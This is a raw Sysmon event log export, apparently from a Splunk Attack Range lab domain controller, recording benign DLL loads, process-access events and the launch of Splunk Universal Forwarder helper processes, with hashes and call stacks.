Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x8000000000000000100249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x8000000000000000100248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778trueSplunk, Inc.Valid 10341000x8000000000000000100243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100242Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100241Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100240Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100239Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100238Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100237Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.218{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x8000000000000000100340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:52.169{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:52.169{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:52.169{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x8000000000000000100337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:52.013{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:52.013{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 